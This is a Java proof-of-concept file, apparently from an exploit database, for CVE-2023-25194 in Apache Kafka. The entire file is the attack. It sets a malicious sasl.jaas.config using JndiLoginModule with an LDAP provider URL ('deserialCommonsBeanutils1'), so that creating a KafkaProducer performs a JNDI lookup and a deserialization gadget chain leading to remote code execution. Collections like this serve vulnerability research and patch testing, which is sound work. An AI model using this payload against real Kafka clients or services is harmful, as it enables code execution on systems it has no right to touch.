openkylin-exploit-db/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/main/java/Test.java

26 lines
1.3 KiB
Java

import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.Producer;
import org.apache.kafka.clients.producer.ProducerRecord;
import java.util.Properties;
public class Test {
public static void main(String[] args) {
Properties props = new Properties();
props.put("sasl.mechanism","SCRAM-SHA-256");
props.put("security.protocol","SASL_SSL");
// props.put("security.protocol","SASL_PLAINTEXT");
props.put("sasl.jaas.config","com.sun.security.auth.module.JndiLoginModule " +
"required user.provider.url=\"ldap://127.0.0.1:1389/deserialCommonsBeanutils1\" " +
"useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" " +
"group.provider.url=\"xxx\";");
props.put("bootstrap.servers", "localhost:9092");
props.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
props.put("value.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
Producer<String, String> producer = new KafkaProducer<>(props);
}
}